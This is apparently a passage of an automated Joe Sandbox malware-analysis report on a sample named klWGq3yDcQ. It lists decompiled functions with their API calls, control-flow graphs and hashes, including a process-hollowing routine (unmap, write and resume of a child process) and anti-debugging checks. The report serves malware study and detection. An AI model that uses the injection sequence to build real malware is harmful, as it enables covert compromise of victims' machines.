                                                                                                                                                                                                      • Opcode ID: 38b6782d371fa38301d256e5d652afa3080897bf4fc6e337818a6e8fef98eadb
                                                                                                                                                                                                      • Instruction ID: 916d8d31424d332028d08442ddf11976d49fcbb398fe0f80a4dc0a983208b3f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38b6782d371fa38301d256e5d652afa3080897bf4fc6e337818a6e8fef98eadb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 143138B0605610AFC3216F65AC49E5B3FACEF85365710053BF245A21E0D7785A41CBAD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 025B0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 025B0156
                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 025B016C
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 025B0255
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025B0270
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 025B0283
                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 025B029F
                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025B02C8
                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 025B02E3
                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 025B0304
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 025B032A
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 025B0399
                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 025B03BF
                                                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 025B03E1
                                                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 025B03ED
                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 025B0412
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679668945.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_25b0000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 93872480-0
                                                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction ID: e555508d700fe94a382f898a4467955b5925cfb0c7d7228fd02405c2f395d566
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97B1B574A00208AFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE45CF94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040410B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36librarymemoryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 180 40410b-4041bf LoadLibraryW GetProcAddress VirtualProtect
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00404115
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,005D6550), ref: 0040418F
                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(00000020,?), ref: 004041B8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                                                      • String ID: $kernel32.dll
                                                                                                                                                                                                      • API String ID: 3509694964-2116778257
                                                                                                                                                                                                      • Opcode ID: 22a4f4bf7306eb6b98d4f20a53bd8a28bb4fdc09efc8bd0ec5bfde06e8165a47
                                                                                                                                                                                                      • Instruction ID: 6109632eb69a26ca137ca2c7fcba41926974768f7ba44181e94517b5b6f2f70a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22a4f4bf7306eb6b98d4f20a53bd8a28bb4fdc09efc8bd0ec5bfde06e8165a47
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9111EC7040A2C0EEE721CF6CFD0C7053FA66332748F84019BD184562BAD7BA519DE726
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 023E97C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 190 23e97c6-23e97df 191 23e97e1-23e97e3 190->191 192 23e97ea-23e97f6 CreateToolhelp32Snapshot 191->192 193 23e97e5 191->193 194 23e97f8-23e97fe 192->194 195 23e9806-23e9813 Module32First 192->195 193->192 194->195 200 23e9800-23e9804 194->200 196 23e981c-23e9824 195->196 197 23e9815-23e9816 call 23e9485 195->197 201 23e981b 197->201 200->191 200->195 201->196
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023E97EE
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 023E980E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 023E9000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_23e9000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: 5bb8bdb079c72f25a9f974f7786454cd928b1bfbb340cb59e1b515bd485871d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2F096312007206FEB203FF5A88DB6E76E8AF89725F100668E657910C0DB70E8494B61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004041C0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 144memorylibrarytimeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004041C5
                                                                                                                                                                                                      • SetLocalTime.KERNEL32(00000000), ref: 004041E6
                                                                                                                                                                                                        • Part of subcall function 00403CD0: std::exception::exception.LIBCMT ref: 00403CDA
                                                                                                                                                                                                        • Part of subcall function 00405730: __wcstoi64_l.LIBCMT ref: 00405726
                                                                                                                                                                                                        • Part of subcall function 00405701: __wcstoi64.LIBCMT ref: 0040570D
                                                                                                                                                                                                      • _abort.LIBCMT ref: 00404228
                                                                                                                                                                                                        • Part of subcall function 00405021: __NMSG_WRITE.LIBCMT ref: 00405042
                                                                                                                                                                                                        • Part of subcall function 00405021: _raise.LIBCMT ref: 00405053
                                                                                                                                                                                                        • Part of subcall function 00405021: _memset.LIBCMT ref: 004050EB
                                                                                                                                                                                                        • Part of subcall function 00405021: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0040511D
                                                                                                                                                                                                        • Part of subcall function 00405021: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040512A
                                                                                                                                                                                                        • Part of subcall function 00403E1F: _ldexp.LIBCMT ref: 00403E2C
                                                                                                                                                                                                        • Part of subcall function 00405EE6: _doexit.LIBCMT ref: 00405EF2
                                                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000000), ref: 00404254
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 0040426D
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00404273
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00404275
                                                                                                                                                                                                      • SetComputerNameW.KERNEL32(00000000), ref: 004042B8
                                                                                                                                                                                                      • GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004042D9
                                                                                                                                                                                                      • GetNumberFormatW.KERNEL32(00000000,00000000,gicizovadaxike,00000000,?,00000000), ref: 004042EF
                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 004042F8
                                                                                                                                                                                                      • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00404307
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040431D
                                                                                                                                                                                                      • EndUpdateResourceA.KERNEL32(00000000,00000000), ref: 00404343
                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00404354
                                                                                                                                                                                                      • GetSystemWindowsDirectoryA.KERNEL32(?,00000000), ref: 00404362
                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 00404370
                                                                                                                                                                                                      • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 00404381
                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 0040438F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLast$ComputerDirectoryExceptionFilterLocalNameProcessResourceUnhandledWindows$AliasAliasesAllocCurrentFindFormatH_prologLibraryListLoadNumberSystemTimeUpdate__wcstoi64__wcstoi64_l_abort_doexit_ldexp_memset_raisestd::exception::exception
                                                                                                                                                                                                      • String ID: Gm $bad exception$gicizovadaxike$msimg32.dll
                                                                                                                                                                                                      • API String ID: 3528909803-3012029016
                                                                                                                                                                                                      • Opcode ID: 92e8a99ca880039b65c6f0e58e712fac0581c67dc700d7fe661ac808ef12ef68
                                                                                                                                                                                                      • Instruction ID: 15bc25406d2bf01194df0353fde5e3b77ae0d26d15ee4f22dc6ac41848330041
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92e8a99ca880039b65c6f0e58e712fac0581c67dc700d7fe661ac808ef12ef68
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C441D1B1901964EBC711BB61ED489CF3A6DFF86354B40407BF146B25A1CB3C5A81CBAD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00406056 Relevance: 22.6, APIs: 15, Instructions: 86COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 101 406056-406065 102 406067-406073 101->102 103 40608e 101->103 102->103 104 406075-40607c 102->104 105 406091-40609d call 40ba8b 103->105 104->103 106 40607e-40608c 104->106 109 4060a7-4060ae call 40a6b5 105->109 110 40609f-4060a6 call 405ffe 105->110 106->105 115 4060b0-4060b7 call 405ffe 109->115 116 4060b8-4060c7 call 40b192 call 409326 109->116 110->109 115->116 123 4060d1-4060ed GetCommandLineA call 40b954 call 40b899 116->123 124 4060c9-4060d0 call 405c76 116->124 131 4060f7-4060fe call 40b621 123->131 132 4060ef-4060f6 call 405c76 123->132 124->123 137 406100-406107 call 405c76 131->137 138 406108-406111 call 405d35 131->138 132->131 137->138 143 406113-406119 call 405c76 138->143 144 40611a-406122 call 40b5c2 138->144 143->144 149 406124-406128 144->149 150 40612a-40612c 144->150 151 40612d-406135 call 4043a4 149->151 150->151 153 40613a-406140 151->153 154 406142-406143 call 405ee6 153->154 155 406148-4061a4 call 405f12 call 4095f1 153->155 154->155
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp__wincmdln
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3545360858-0
                                                                                                                                                                                                      • Opcode ID: e29a4f2b5acadd5959f12dbf377411e154dd556389362516ac4e9d05b1f3ce9f
                                                                                                                                                                                                      • Instruction ID: 22a4bc19aaad6074953f51e1c78b27f214f1a36a5df2c3372685105ba99cc4ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e29a4f2b5acadd5959f12dbf377411e154dd556389362516ac4e9d05b1f3ce9f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 022191B094070599EB24BB72A946B6E2664EF0070CF11847FF4467A1D2EF7C88A19B5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 025B0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 163 25b0420-25b04f8 165 25b04fa 163->165 166 25b04ff-25b053c CreateWindowExA 163->166 169 25b05aa-25b05ad 165->169 167 25b053e 166->167 168 25b0540-25b0558 PostMessageA 166->168 167->169 170 25b055f-25b0563 168->170 170->169 171 25b0565-25b0579 170->171 171->169 173 25b057b-25b0582 171->173 174 25b05a8 173->174 175 25b0584-25b0588 173->175 174->170 175->174 176 25b058a-25b0591 175->176 176->174 177 25b0593-25b0597 call 25b0110 176->177 179 25b059c-25b05a5 177->179 179->174
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 025B0533
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679668945.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_25b0000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction ID: a308cdcc980ba36b8d5b47f84608e917706b52285cb26a772b10a58f1357a454
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8511A70D08388DAEB11CBD8C849BDEBFB66F11708F144058D5447F2C6C3BA5A58CB66
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 025B05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 181 25b05b0-25b05d5 182 25b05dc-25b05e0 181->182 183 25b061e-25b0621 182->183 184 25b05e2-25b05f5 GetFileAttributesA 182->184 185 25b0613-25b061c 184->185 186 25b05f7-25b05fe 184->186 185->182 186->185 187 25b0600-25b060b call 25b0420 186->187 189 25b0610 187->189 189->185
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 025B05EC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679668945.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_25b0000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction ID: c4483c1d6dd8d87a8e51d2098c1e3d83e4629e8abeb9dc08fe076e57c05cb7ec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA011E70C0425CEADF11DFA8C5187EEBFB5AF41308F148099C4092B281D7769B59CBA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040BA8B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 203 40ba8b-40baad HeapCreate 204 40bab1-40baba 203->204 205 40baaf-40bab0 203->205
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040609A,00000001), ref: 0040BAA0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                      • Opcode ID: 5352d8a38c414f081a158b84bbea4e7a41d2baa5dc014b237cd512c13185dee2
                                                                                                                                                                                                      • Instruction ID: ad4029ef072d74f7b8a662ebc6abdbfbede0ebf6ed3c701b4e41a7520a73f68d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5352d8a38c414f081a158b84bbea4e7a41d2baa5dc014b237cd512c13185dee2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD0A736690344AFDB109F707D08B623BDCE3887A5F104437F91DD6290F674C541D648
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 023E9485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 206 23e9485-23e94bf call 23e9798 209 23e950d 206->209 210 23e94c1-23e94f4 VirtualAlloc call 23e9512 206->210 209->209 212 23e94f9-23e950b 210->212 212->209
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023E94D6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 023E9000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_23e9000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: 84f36f282dd5cc0dbe9bd970f9c8b1a6b48f149052e322833081c421f53c4577
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1113C79A00208EFDB01DF98C985E99BBF5EF08350F058094F9499B3A1D371EA94DF80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00404004 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 88filepipetimeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00404046
                                                                                                                                                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 0040404E
                                                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00404057
                                                                                                                                                                                                      • CreateNamedPipeW.KERNEL32(nolebacitin covinarefogajonizonaxiyexor,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404069
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,catufiyeyebiy), ref: 00404079
                                                                                                                                                                                                      • SetConsoleWindowInfo.KERNEL32(00000000,00000000,00000000), ref: 00404082
                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 00404089
                                                                                                                                                                                                      • OpenWaitableTimerW.KERNEL32(00000000,00000000,gafadayokutivewapogematiden), ref: 00404096
                                                                                                                                                                                                      • CreateFileW.KERNEL32(sujibadopidovotudi,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004040A7
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000000), ref: 004040B5
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 004040BF
                                                                                                                                                                                                      • InitializeSListHead.KERNEL32(?), ref: 004040CF
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004040D6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • gafadayokutivewapogematiden, xrefs: 0040408F
                                                                                                                                                                                                      • nolebacitin covinarefogajonizonaxiyexor, xrefs: 00404064
                                                                                                                                                                                                      • sujibadopidovotudi, xrefs: 004040A2
                                                                                                                                                                                                      • catufiyeyebiy, xrefs: 0040406F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Create$ConsoleFileInfo$DateDirectoryEnumFormatsHandleHeadInitializeInputListMappingModuleNamedObjectOpenPipeReadSystemTimerValueWaitableWindowWindows
                                                                                                                                                                                                      • String ID: catufiyeyebiy$gafadayokutivewapogematiden$nolebacitin covinarefogajonizonaxiyexor$sujibadopidovotudi
                                                                                                                                                                                                      • API String ID: 3028345792-1832176304
                                                                                                                                                                                                      • Opcode ID: 6b89c13cd9591ba1be9e9d638d8da564c502f731b61e7fd3196076b4823f6c4a
                                                                                                                                                                                                      • Instruction ID: f0377ec0db126e7c1da513f61da9344e1b0907be9a8047da7388d670df29e93c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b89c13cd9591ba1be9e9d638d8da564c502f731b61e7fd3196076b4823f6c4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 461129B2502564BBD7116BE1AE4CDDF3F6CEF4A7527004026F246F2560C6385685CBBD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040667B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040BC67
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040BC7C
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00402484), ref: 0040BC87
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040BCA3
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0040BCAA
                                                                                                                                                                                                      Memory Dump Source
